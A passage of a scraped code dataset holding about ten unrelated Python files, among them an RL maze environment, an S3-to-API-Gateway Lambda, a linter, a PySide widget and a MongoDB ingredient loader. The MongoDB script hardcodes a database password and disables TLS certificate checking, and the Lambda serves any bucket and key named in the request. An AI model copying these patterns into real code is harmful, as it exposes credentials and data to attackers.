leftIndex -= 1\n curIndex -= 1\n elif nums1[leftIndex] < nums2[rightIndex]:\n nums1[curIndex] = nums2[rightIndex]\n rightIndex -= 1\n curIndex -= 1\n","repo_name":"Moshi-Li/codePractice","sub_path":"leetcode/088.py","file_name":"088.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13979905199","text":"# coding=UTF-8\n\"\"\"\nReinforcement learning maze example.\nRed rectangle: explorer.\nBlack rectangles: hells [reward = -1].\nYellow bin circle: paradise [reward = +1].\nAll other states: ground [reward = 0].\nThis script is the environment part of this example.\nThe RL is in RL_brain.py.\nView more on my tutorial page: https://morvanzhou.github.io/tutorials/\n\"\"\"\n\n\"\"\"定义三个参数的取值\"\"\"\nimport numpy as np\nimport time\nimport sys\n\nUNIT = 40 # pixels 像素\nMAZE_H = 84 # grid height 网格高度\nMAZE_W = 84 # grid width 网格宽度\n# class Maze(tk.Tk, object):\nclass Maze(object): #继承父类object\n def __init__(self):\n super(Maze, self).__init__() #对继承自父类的属性进行初始化\n para1 = list(range(100, 140)) #1.1-1.4\n para2 = [2, 3, 4, 5, 6, 7, 8] #2-8\n para3 = list(range(60, 90)) # 0.6-0.9\n self.parameter_space = []\n for i in range(len(para1)):\n for j in range(len(para2)):\n for k in range(len(para3)):\n self.parameter_space.append((para1[i]/100.0, para2[j], para3[k]/100.0))\n #append() 方法用于在列表末尾添加新的对象。\n #print(self.parameter_space)\n ###self.action_space = ['u', 'd', 'l', 'r']\n self.action_space = [] #三个参数的取值空间\n for i in range(len(para1)*len(para2)*len(para3)):\n self.action_space.append(i) #[0-10500]\n self.n_actions = len(self.action_space)\n self.height = MAZE_H\n self.width = MAZE_H\n self.n_features = self.height * self.width #特征网格的大小\n # self.title('maze')\n # self.geometry('{0}x{1}'.format(MAZE_H * UNIT, MAZE_H * UNIT))\n # self._build_maze()\n\n def _build_maze(self):\n self.canvas = tk.Canvas(self, bg='white', \n height=MAZE_H * UNIT,\n width=MAZE_W * UNIT)\n\n # create grids\n for c in range(0, MAZE_W * UNIT, UNIT):\n x0, y0, x1, y1 = c, 0, c, MAZE_H * UNIT\n self.canvas.create_line(x0, y0, x1, y1)\n for r in range(0, MAZE_H * UNIT, UNIT):\n x0, y0, x1, y1 = 0, r, MAZE_W * UNIT, r\n self.canvas.create_line(x0, y0, x1, y1)\n\n # create origin\n origin = np.array([20, 20])\n\n # hell\n hell1_center = origin + np.array([UNIT * 2, UNIT])\n self.hell1 = self.canvas.create_rectangle(\n hell1_center[0] - 15, hell1_center[1] - 15,\n hell1_center[0] + 15, hell1_center[1] + 15,\n fill='black') #绘制黑色矩形框\n\n # create oval\n oval_center = origin + UNIT * 2\n self.oval = self.canvas.create_oval(\n oval_center[0] - 15, oval_center[1] - 15,\n oval_center[0] + 15, oval_center[1] + 15,\n fill='yellow')\n\n # create red rect\n self.rect = self.canvas.create_rectangle(\n origin[0] - 15, origin[1] - 15,\n origin[0] + 15, origin[1] + 15,\n fill='red') #绘制红色圆形\n\n # pack all\n self.canvas.pack()\n #重置环境状态,回到初始环境,方便下一次观测\n def reset(self):\n observation = np.zeros(self.n_features) #创建一个一维数组,大小为n_features\n return observation\n #推进时间步长,返回下一状态和奖励\n def step(self, action):\n\n s_ = np.zeros(self.n_features)\n parameter = self.parameter_space[action]\n print(parameter)\n reward = parameter[0] + parameter[1] + parameter[2]\n done = True\n return s_, reward, done\n\n def render(self):\n # time.sleep(0.01)\n 
self.update()\n\n\n","repo_name":"GaoVinfly/ORBSLAM3-AND-DDPG","sub_path":"maze_env.py","file_name":"maze_env.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39622289842","text":"# Sends binary data from AWS S3 to API Gateway via AWS Lambda function through lambda proxy integration\n\nimport json\nimport base64\nimport boto3\n\ndef lambda_handler(event, context):\n \n s3 = boto3.client(\"s3\") \n \n # for lambda proxy integration \n bucket_name = event['pathParameters']['bucket']\n file_name = event['queryStringParameters']['file']\n \n file_object = s3.get_object(Bucket=bucket_name, Key=file_name)\n file_content = file_object[\"Body\"].read()\n \n print(bucket_name, file_name)\n\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Content-Type\": \"application/pdf\"\n },\n \"body\" : base64.b64encode(file_content),\n \"isBase64Encoded\": True\n }\n \n # In case one wants to send json as response\n \n # return {\n # \"statusCode\": 200,\n # \"headers\": {\n # \"Content-Type\": \"application/json\"\n # },\n # \"body\" : json.dumps(\"Json response\"),\n # \"isBase64Encoded\": False\n # }","repo_name":"Sayan3sarkar/AWS_APIGateway_Lambda_functions","sub_path":"lambda_proxy_binary_data_from_lambda_to_APIGateway.py","file_name":"lambda_proxy_binary_data_from_lambda_to_APIGateway.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12502780547","text":"import sys\nfrom PySide2.QtWidgets import QApplication, QWidget,QSlider\nfrom PySide2.QtGui import QPainter, QPaintEvent\nfrom PySide2 import QtCore,QtWidgets\n\nclass MonPainter(QWidget):\n def __init__(self, parent=None):\n super(MonPainter, self).__init__(parent)\n self.valeur= 0\n\n\n def paintEvent(self, event:QPaintEvent):\n p = QPainter(self)\n p.setBrush(QtCore.Qt.blue)\n\n taille = min(self.width(),self.height())\n\n p.drawRect(10,10,taille-20, taille-20)\n p.setBrush(QtCore.Qt.yellow)\n p.drawEllipse(20,20,taille-40, taille-40)\n\n\n p.translate(taille/2,taille/2)\n p.rotate(135 + self.valeur*2.7)\n\n p.drawLine(0,0,0,taille/3)\n\n\n\n def setValeur(self,val):\n self.valeur = val\n self.update()\n\nclass MaFenetrePrincipale(QWidget):\n\n def __init__(self,parent = None):\n super(MaFenetrePrincipale,self).__init__(parent)\n\n self.compteur = MonPainter()\n self.slider = QSlider(QtCore.Qt.Horizontal)\n self.layout = QtWidgets.QVBoxLayout()\n self.layout.addWidget(self.compteur)\n self.layout.addWidget(self.slider)\n self.setLayout(self.layout)\n self.slider.valueChanged.connect(self.compteur.setValeur)\n\n\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n maFen = MaFenetrePrincipale()\n maFen.show()\n sys.exit(app.exec_())","repo_name":"nick-andri/painter","sub_path":"monPainter.py","file_name":"monPainter.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37795648204","text":"import utils\nimport csv\n\ndef stripped_file(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A dictionary containing all the lines in the source code with a line\n number starting from line 1.\n { line_number: source line}\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Strips the '\\n' and '\\r' characters of the file as 
they are not\n included in the consideration of the length of a line.\n\n '''\n file = open(file_name)\n all_lines = {}\n # Counts the line number from 1\n line_counter = 1\n for line in file:\n stripped_line = line.rstrip('\\n\\r')\n all_lines[line_counter] = stripped_line\n # As the newline characters and return characters are\n # stripped off the line, the line number is incremented by 1\n line_counter += 1\n file.close()\n return all_lines\n\ndef single_char_var(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column number\n of the first and only character of the variable name, variable name,\n and line in the source code\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the variable names consisting of a single character.\n All repeated single character variables on the same line are also\n reported.\n\n '''\n result = []\n # Calls the vars_indents function in the utils module\n # to retrieve the dictionary containing variables\n variables_dict = utils.vars_indents(file_name)[0]\n all_lines = stripped_file(file_name)\n error_type = 'SINGLE_CHAR_VAR'\n for line_number in variables_dict:\n list = variables_dict[line_number]\n line = all_lines[line_number]\n for tuple in list:\n variable, col_number = tuple\n # If the variable is a single character, a tuple is created\n # and appended to a list\n if len(variable) == 1:\n detail = (error_type, line_number, col_number, variable, line)\n result.append(detail)\n return result\n\ndef long_line(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, None type, length\n of line, and line in the source code\n # Note: None type is used in the column of the <prefix>.lint.csv file as\n there is no column number for a long line.\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the lines that contains more than 79 characters.\n\n '''\n all_lines = stripped_file(file_name)\n result = []\n error_type = 'LONG_LINE'\n for line_number in all_lines:\n line = all_lines[line_number]\n line_length = len(line)\n # If the length of the line exceeds 79 characters, a tuple\n # is created and appended to a list\n if line_length > 79:\n detail = (error_type, line_number, None, line_length, line)\n result.append(detail)\n return result\n\ndef get_first_whitespace(line):\n '''\n +--------+\n | Output |\n +--------+\n An integer of the first column number of the trailing whitespace character\n in the corresponding line\n\n +-----------+\n | Parameter |\n +-----------+\n A string of a line of source code\n\n +----------+\n | Function |\n +----------+\n Gets the column of the first column number by testing if the character\n is a space (' ') or a tab ('\\t') character.\n\n '''\n number_cols = len(line)\n count = 0\n for char in line[::-1]:\n if char in ' \\t':\n count += 1\n else:\n break\n col_number = number_cols - count + 1\n return col_number\n\ndef trail_whitespace(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column position\n of first trailing whitespace, None type, and line in the source code\n # Note: None type is used in the INFO column of the <prefix>.lint.csv\n file as it is an empty field\n\n +-----------+\n | Parameter |\n +-----------+\n A 
string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the lines that contains space or tab characters immediately before\n the end of a line\n \n '''\n all_lines = stripped_file(file_name)\n result = []\n error_type = 'TRAIL_WHITESPACE'\n for line_number in all_lines:\n line = all_lines[line_number]\n # If the end of the line contains spaces or tab characters,\n # a tuple is created and appended to a list\n if line.endswith(' ') or line.endswith('\\t'):\n col_number = get_first_whitespace(line)\n detail = (error_type, line_number, col_number, None, line)\n result.append(detail)\n return result\n\ndef bad_indent(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column position\n of first character immediately after indentation, None type, and line in\n the source code\n # Note: None type is used in the INFO column of the <prefix>.lint.csv\n file as it is an empty field\n \n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the lines that has an indentation that is not a multiple of 4\n single spaces, inclusive of tab characters\n\n '''\n # Calls the vars_indents function in the utils module\n # to retrieve the dictionary containing indentations\n indents_dic = utils.vars_indents(file_name)[1]\n all_lines = stripped_file(file_name)\n result = []\n error_type = 'BAD_INDENT'\n for line_number in indents_dic:\n indents, end_col = indents_dic[line_number]\n line = all_lines[line_number]\n # Number of single spaces is before the column position\n col_indents = end_col - 1\n # If the number of spaces is not a multiple of 4,\n # a tuple is created and appended to a list\n if col_indents % 4 != 0:\n detail = (error_type, line_number, end_col, None, line)\n result.append(detail)\n return result\n\ndef all_errors(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column number,\n info, and line in the source code\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Gets all the errors in the file and arrange them in ascending line number\n\n '''\n single_char_errors = single_char_var(file_name)\n long_line_errors = long_line(file_name)\n trail_whitespace_errors = trail_whitespace(file_name)\n bad_indent_errors = bad_indent(file_name)\n result = []\n for tuple in single_char_errors:\n result.append(tuple)\n for tuple in long_line_errors:\n result.append(tuple)\n for tuple in trail_whitespace_errors:\n result.append(tuple)\n for tuple in bad_indent_errors:\n result.append(tuple)\n # All the errors are sorted by the line number\n result.sort(key = lambda detail: detail[1])\n return result\n\ndef error_file(file_name):\n '''\n +--------+\n | Output |\n +--------+\n None\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Creates a CSV file containing the summary of all the style errors made in\n the input file\n\n '''\n prefix = file_name[:-3]\n out_name = prefix + '.lint.csv'\n csv_file = open (out_name, \"w\")\n allerrors = all_errors(file_name)\n header = [('ERROR_TYPE', 'LINE_NUMBER', 'COLUMN', 'INFO', 'SOURCE_LINE')]\n writer = csv.writer(csv_file)\n writer.writerows(header)\n # A container is used to make a sequence for 
writing a row in the CSV file\n for tuple in allerrors:\n container = []\n container.append(tuple)\n writer.writerows(container)\n csv_file.close()\n\ndef count_score(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A floating point rounded to 2 decimal places\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Calculates the quality score of the style errors made in the input style\n over a score of 10\n '''\n # Gets all the errors made from all_errors function\n allerrors = all_errors(file_name)\n totalpenalty = 0.0\n for tuple in allerrors:\n error_type = tuple[0]\n if error_type == 'TRAIL_WHITESPACE':\n totalpenalty += 1.0\n elif error_type == 'SINGLE_CHAR_VAR':\n totalpenalty += 2.0\n elif error_type == 'BAD_INDENT':\n totalpenalty += 4.0\n elif error_type == 'LONG_LINE':\n totalpenalty += 5.0\n # Number of lines is the number of keys in stripped_file function\n numlines = len(stripped_file(file_name))\n # If the file is empty, a penalty score of 10 is given\n if numlines == 0:\n penalty = 10.0\n else:\n penalty = ((totalpenalty / numlines) * 10)\n qualityscore = max(0, 10 - penalty)\n return round(qualityscore, 2)\n\ndef score_file(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A CSV file containing the timestamp of when the lint file is run,\n and the quality score of the input file\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the prefix of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Creates a CSV file that contains the history of the quality score\n of the input Python file\n\n '''\n prefix = file_name[:-3]\n score_file = open(prefix + '.score.csv', 'a')\n writer = csv.writer(score_file)\n row = []\n container = []\n timestamp = utils.get_current_date_time()\n qualityscore = count_score(file_name)\n row.append(timestamp)\n row.append(qualityscore)\n container.append(row)\n writer.writerows(container)\n score_file.close()\n\ndef lint(file_name):\n '''\n +--------+\n | Output |\n +--------+\n None\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the prefix of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Checks the styling errors in the input file and creates an error file\n and modifies a quality score log file\n\n '''\n error = error_file(file_name)\n score = score_file(file_name)\n return None\n","repo_name":"kicholiz/LintForPython","sub_path":"lint.py","file_name":"lint.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30674273924","text":"import pymongo\nfrom wiki_info import get_info\nimport ssl\nfrom Image_Parsing.image_parse import parse_ingredients_path\n\nmyclient = pymongo.MongoClient(\"mongodb+srv://ryan:password22@cluster0-cxijt.gcp.mongodb.net/test?retryWrites=true&ssl=true&ssl_cert_reqs=CERT_NONE\")\n\n# food = {\n# \"name\" : string,\n# \"ingredients\" : [list by ID]\n# }\n\n# ingredient = {\n# \"title\",\n# \"summary\",\n# \"health\"\n# }\n\ndef api_wrapper(name, path):\n lst = parse_ingredients_path(path)\n create_entry(name, lst)\n\n\ndef create_entry(name, ingredients):\n db = myclient.ingredientInfo\n food_ingredients = db.ingredients\n foods = db.foods\n\n if foods.find_one({'name' : name}) != None:\n return\n\n food_post = {\n \"name\" : name,\n \"ingredients\" : []\n }\n\n for i in ingredients:\n id = 
food_ingredients.find_one({'name': i})\n\n if id == None: # if ingredient not in database\n d = get_info(i)\n if d != None:\n post_data = {\n \"name\" : i,\n \"info\" : d\n }\n result = food_ingredients.insert_one(post_data)\n\n food_post[\"ingredients\"].append(i)\n result = foods.insert_one(food_post)\n\n\n\ndef postTest(term):\n\n db = myclient.ingredientInfo\n posts = db.posts\n\n post_data = {\n \"title\" : term,\n }\n #\n\n result = posts.insert_one(post_data)\n\n\n# db = myclient.test2\n# posts = db.ingredients\n#\n# post_data = {\n# \"title\" : \"water\",\n# \"info\" : get_info(\"water\")\n# }\n# result = posts.insert_one(post_data)\n\n# postTest(\"glucose\")\n#\n# db = myclient.ingredient_info\n# posts = db.posts\n#\n# x = posts.find_one({'title': 'apple'})\n# if x == None:\n# print(\"none\")\n# else:\n# print(x[\"_id\"])\n# x = mycol.insert_one(post_data)\n#print(x)\n#print(myclient.list_database_names())\n","repo_name":"rafael123rr/Minervahackathon","sub_path":"Backend/mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3001130183","text":"#!/usr/bin/python3\r\n# coding=UTF-8\r\nimport platform\r\nimport sys, os\r\n\r\n\r\ndef Exit(score, Answered_questions, correct_questions, unlocked_tools):\r\n print(\"您总共获得了\", score, \"分积分\")\r\n print(\"总共解锁了\", unlocked_tools, '个工具')\r\n print(\"您总共参与了\", Answered_questions, \"次答题\")\r\n print(\"共有\", correct_questions, \"次答题是正确的\")\r\n print(\"==========================GOODBYE============================\")\r\n sys.exit()\r\n\r\n\r\ndef SaveRecord(score, Answered_questions, correct_questions, unlocked_tools):\r\n try:\r\n fw1 = \"您总共获得了\" + str(score) + \"分积分\\n\" # 第一行文字\r\n fw2 = \"总共解锁了\" + str(unlocked_tools) + '个工具\\n' # 第二行文字\r\n fw3 = \"您总共参与了\" + str(Answered_questions) + \"次答题\\n\" # 第三行\r\n fw4 = \"共有\" + str(correct_questions) + \"次答题是正确的\\n\" # 第四行\r\n file = open(file=\"Record.eshf\", mode=\"a\")\r\n file.write(fw1)\r\n file.write(fw2)\r\n file.write(fw3)\r\n file.write(fw4)\r\n file.write(\"==============================================\")\r\n except Exception as error:\r\n print(\"出现错误:%s\" % error)\r\n print(\"保存失败!\")\r\n else:\r\n print(\"保存成功,文件为本目录下的Record.eshf\")\r\n finally:\r\n pass\r\n\r\n\r\ndef calc():\r\n print(\"输入START开始计算,输入HELP进入帮助模式,输入CHECK_VERSION查看版本,输入QUIT退出\")\r\n command = input(\"请输入指令:\")\r\n if command == \"START\":\r\n del command\r\n while 1:\r\n \"\"\"shuzi1 = int(input(\"PLEASE TYPE IN THE FIRST NUMBER IN YOUR FORMULA>\"))\r\n _operator_ = input(\"PLEASE TYPE IN THE OPERATOR>\")\r\n shuzi2 = int(input(\"PLEASE TYPE IN THE FIRST NUMBER IN YOUR FORMULA>\"))\r\n if _operator_ == \"+\":\r\n print(\"ANSWER = \", shuzi1 + shuzi2)\r\n elif _operator_ == \"-\":\r\n print(\"ANSWER = \", shuzi1 - shuzi2)\r\n elif _operator_ == \"*\":\r\n print(\"ANSWER = \", shuzi1 * shuzi2)\r\n elif _operator_ == \"**\":\r\n print(\"ANSWER =\", shuzi1 ** shuzi2)\r\n elif _operator_ == \"/\":\r\n if shuzi2 == 0:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n else:\r\n print(\"ANSWER = \", shuzi1 / shuzi2)\r\n elif _operator_ == \"//\":\r\n if not shuzi2 == \"0\":\r\n print(\"ANSWER = \", shuzi1 // shuzi2)\r\n else:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n else:\r\n print(\"ERROR! 
0x00000001 ValueError\")\"\"\"\r\n try:\r\n shuzi1 = float(input(\"请输入算式中的第一个数:\"))\r\n _operator_ = input(\"请输入运算符:\")\r\n shuzi2 = float(input(\"请输入算式中的第二个数:\"))\r\n except ValueError as error:\r\n print(\"本计算器仅支持确切的一个数进行计算,不支持带有字母等字符的数进行计算哦!\")\r\n else:\r\n if _operator_ == \"+\":\r\n print(\"答案是\", shuzi1 + shuzi2)\r\n elif _operator_ == \"-\":\r\n print(\"答案是\", shuzi1 - shuzi2)\r\n elif _operator_ == \"*\":\r\n print(\"答案是\", shuzi1 * shuzi2)\r\n elif _operator_ == \"**\":\r\n print(\"答案是\", shuzi1 ** shuzi2)\r\n elif _operator_ == \"/\":\r\n if shuzi2 == 0:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n else:\r\n print(\"答案是\", shuzi1 / shuzi2)\r\n elif _operator_ == \"//\":\r\n if not shuzi2 == \"0\":\r\n print(\"答案是\", shuzi1 // shuzi2)\r\n else:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n elif _operator_ == \"exit\" or _operator_ == \"EXIT\" or _operator_ == \"Exit\":\r\n print(\"ヾ( ̄▽ ̄)Bye~Bye~\")\r\n break\r\n else:\r\n print(\"ERROR! 0x00000001 OperatorError\")\r\n finally:\r\n pass\r\n\r\n elif command == \"HELP\":\r\n del command\r\n print(\"*************************简易计算器帮助文件*************************\")\r\n print(\"1.运算符\")\r\n print(\"加法 +\")\r\n print(\"减法 -\")\r\n print(\"乘法 *\")\r\n print(\"除法 /\")\r\n print(\"整除 //\")\r\n print(\"幂运算(次方运算) **\")\r\n print(\"2.退出计算模式\")\r\n print(\"注意!这会直接退出简易计算器程序,不会回到菜单栏!!!\")\r\n print(\"方法:在询问运算符时输入exit即可(全大写或首字母大写都能实现退出计算模式)\")\r\n elif command == \"CHECK_VERSION\":\r\n del command\r\n print(\"版本:1.0.0.810.1405 beta version 3\")\r\n elif command == \"QUIT\":\r\n del command\r\n print(\"再见\")\r\n else:\r\n print(\"ERROR! 0x00000001 CommandError\")\r\n","repo_name":"YSLF2022/EasyStudyHelper","sub_path":"Resourse.py","file_name":"Resourse.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36537484005","text":"import unittest\n\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nfrom src.find_papers_by_keyword.embeddings_generator import EmbeddingsGenerator\nfrom src.file_readers.paper_file_reader import PaperFileReader\n\nclass TestPaperEmbeddings(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n cls.embeddings_generator = EmbeddingsGenerator()\n\n paper_file = \"test_data/papers.json\"\n file_reader = PaperFileReader('id', 'title', 'abstract', None)\n papers = file_reader.read_file(paper_file)\n cls.embeddings, cls.id_to_ind = cls.embeddings_generator.generate_paper_embeddings(papers)\n\n def testEmbeddingsShape(self):\n self.assertEqual(self.embeddings.shape, (10, 768))\n\n def testEmbeddingValues(self):\n first_paper_raw = \"Sparsity-certifying Graph Decompositions. We describe a new algorithm, the $(k,\\\\ell)$-pebble game with colors, and use\\nit obtain a characterization of the family of $(k,\\\\ell)$-sparse graphs and\\nalgorithmic solutions to a family of problems concerning tree decompositions of\\ngraphs. Special instances of sparse graphs appear in rigidity theory and have\\nreceived increased attention in recent years. In particular, our colored\\npebbles generalize and strengthen the previous results of Lee and Streinu and\\ngive a new proof of the Tutte-Nash-Williams characterization of arboricity. We\\nalso present a new decomposition that certifies sparsity based on the\\n$(k,\\\\ell)$-pebble game with colors. 
Our work also exposes connections between\\npebble game algorithms and previous sparse graph algorithms by Gabow, Gabow and\\nWestermann and Hendrickson.\\n\"\n model = SentenceTransformer('bert-base-nli-mean-tokens')\n first_embedding = model.encode(first_paper_raw)\n\n np.testing.assert_almost_equal(self.embeddings[0], first_embedding)","repo_name":"Forward-UIUC-2021F/kshitij-sinha-find-papers-by-keyword","sub_path":"test/find_papers_by_keyword/test_embeddings_generator.py","file_name":"test_embeddings_generator.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40937132252","text":"import os\nimport random\nimport numpy as np\n\ndis_list = [0.00005, 0.000025, 0.00001, 0.000005]\ngan_list = [0.00005, 0.000025, 0.00001, 0.000005, 0.0000025]\nupdate_it_list = [1, 2, 5] # [1, 2, 5, 10]\ngamma_list = [0]\noptimizer_list = ['Nadam']\nloss_list = ['mean_squared_error']\nbeta_list = [0.0]#, 0.5, 0.9]\n\ndef run_loop():\n gpu = 0 \n cmd_list = []\n for dis in dis_list:\n gan_small_list = np.array(gan_list)[np.array(gan_list) <= dis][0:2]\n for gan in gan_small_list:\n for update_it in update_it_list:\n for optimizer in optimizer_list:\n for loss in loss_list:\n gpu = ((gpu + 1) % 4)\n cmd = \"python3 BrainWeb.py --remote False --paired False --n_epochs 201 --batch_size 10 --show_every 10 --beta 0.0\" \\\n + \" --lr_dis \" + str(dis) \\\n + \" --lr_gan \" + str(gan) \\\n + \" --update_it \" + str(update_it) \\\n + \" --optimizer \" + str(optimizer) \\\n + \" --loss \" + str(loss) \\\n + \" --gpu \" + str(gpu)\n cmd_list.append(cmd)\n\n np.random.shuffle(cmd_list)\n print(len(cmd_list))\n for i in range(4):\n cmd_i = [\"#!/bin/bash\\n\"]\n for idx in range(len(cmd_list)):\n if cmd_list[idx][-1] == str(i):\n cmd_i.append(cmd_list[idx])\n with open(\"p\" + str(i) + \".sh\", 'w') as f:\n for s in cmd_i:\n f.write(str(s) + '\\n')\n print(len(cmd_i) - 1)\n\ndef main():\n run_loop()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"attilasimko/drs","sub_path":"MT/loop_gauss.py","file_name":"loop_gauss.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4411384292","text":"import numpy as np\n\nfrom tsipy.fusion import Windows\n\n\ndef check_window_ranges(\n windows: Windows,\n x_pred_starts: np.ndarray,\n x_pred_ends: np.ndarray,\n x_fit_starts: np.ndarray,\n x_fit_ends: np.ndarray,\n) -> None:\n \"\"\"Checks if input windows have approximately equal window bounds.\n\n Checks prediction and training bounds.\n \"\"\"\n for i, window in enumerate(windows):\n if np.abs(x_pred_starts[i]) == np.infty:\n assert x_pred_starts[i] == window.x_pred_start\n else:\n assert np.abs(x_pred_starts[i] - window.x_pred_start) < 1e-3\n\n if np.abs(x_pred_ends[i]) == np.infty:\n assert x_pred_ends[i] == window.x_pred_end\n else:\n assert np.abs(x_pred_ends[i] - window.x_pred_end) < 1e-3\n\n assert np.abs(x_fit_starts[i] - window.x_fit_start) < 1e-3, \"{} != {}\".format(\n x_fit_starts[i], window.x_fit_start\n )\n assert np.abs(x_fit_ends[i] - window.x_fit_end) < 1e-3, \"{} != {}\".format(\n x_fit_ends[i], window.x_fit_end\n )\n\n\ndef check_array_equal(a: np.ndarray, b: np.ndarray) -> None:\n \"\"\"Checks if both arrays are equal.\"\"\"\n assert np.array_equal(a, b), \"Array a not equal to array b.\"\n\n\ndef check_array_approximate(\n a: np.ndarray,\n b: np.ndarray,\n tolerance: float = 1e-3,\n) -> None:\n 
\"\"\"Checks if both arrays are approximately equal.\"\"\"\n check_array_shape(a, b)\n\n norm_a = np.linalg.norm(a)\n error = np.linalg.norm(a - b) / norm_a\n assert (\n error < tolerance\n ), \"Array a not equal to array b. ({:.6f} < {}, error < tolerance)\".format(\n error, tolerance\n )\n\n\ndef check_array_shape(a: np.ndarray, b: np.ndarray) -> None:\n \"\"\"Checks if both arrays have identical shapes.\"\"\"\n assert np.array_equal(\n a.shape, b.shape\n ), \"Array a {} and b {} shape mismatched.\".format(a.shape, b.shape)\n\n\ndef check_array_1d(a: np.ndarray) -> None:\n \"\"\"Checks if array is one dimensional.\"\"\"\n assert len(a.shape) == 1, \"Array a with shape {} is not 1D.\".format(a.shape)\n assert a.ndim == 1, \"Array a with shape {} is not 1D.\".format(a.shape)\n\n\ndef check_array_2d(a: np.ndarray) -> None:\n \"\"\"Checks if array is one dimensional.\"\"\"\n assert len(a.shape) == 2, \"Array a with shape {} is not 2D.\".format(a.shape)\n assert a.ndim == 2, \"Array a with shape {} is not 2D.\".format(a.shape)\n","repo_name":"roksikonja/tsipy","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40614840837","text":"import torch\nfrom torch import nn as nn\n\n\"\"\"\n <Dense/Tensorzied version of the Diffpool layer>\n \n DIFFPOOL:\n Z. Ying, J. You, C. Morris, X. Ren, W. Hamilton, and J. Leskovec, \n Hierarchical graph representation learning with differentiable pooling (NeurIPS 2018)\n https://arxiv.org/pdf/1806.08804.pdf\n \n ! code started from dgl diffpool examples dir\n\"\"\"\n\nfrom .assignment_layer import DiffPoolAssignment\nfrom .dense_graphsage_layer import DenseGraphSage\n\n\nclass EntropyLoss(nn.Module):\n # Return Scalar\n # loss used in diffpool\n def forward(self, adj, anext, s_l):\n entropy = (torch.distributions.Categorical(\n probs=s_l).entropy()).sum(-1).mean(-1)\n assert not torch.isnan(entropy)\n return entropy\n\n\nclass LinkPredLoss(nn.Module):\n # loss used in diffpool\n def forward(self, adj, anext, s_l):\n link_pred_loss = (\n adj - s_l.matmul(s_l.transpose(-1, -2))).norm(dim=(1, 2))\n link_pred_loss = link_pred_loss / (adj.size(1) * adj.size(2))\n return link_pred_loss.mean()\n\n\nclass DenseDiffPool(nn.Module):\n def __init__(self, nfeat, nnext, nhid, link_pred=False, entropy=True):\n super().__init__()\n self.link_pred = link_pred\n self.log = {}\n self.link_pred_layer = self.LinkPredLoss()\n self.embed = DenseGraphSage(nfeat, nhid, use_bn=True)\n self.assign = DiffPoolAssignment(nfeat, nnext)\n self.reg_loss = nn.ModuleList([])\n self.loss_log = {}\n if link_pred:\n self.reg_loss.append(LinkPredLoss())\n if entropy:\n self.reg_loss.append(EntropyLoss())\n\n def forward(self, x, adj, log=False):\n z_l = self.embed(x, adj)\n s_l = self.assign(x, adj)\n if log:\n self.log['s'] = s_l.cpu().numpy()\n xnext = torch.matmul(s_l.transpose(-1, -2), z_l)\n anext = (s_l.transpose(-1, -2)).matmul(adj).matmul(s_l)\n\n for loss_layer in self.reg_loss:\n loss_name = str(type(loss_layer).__name__)\n 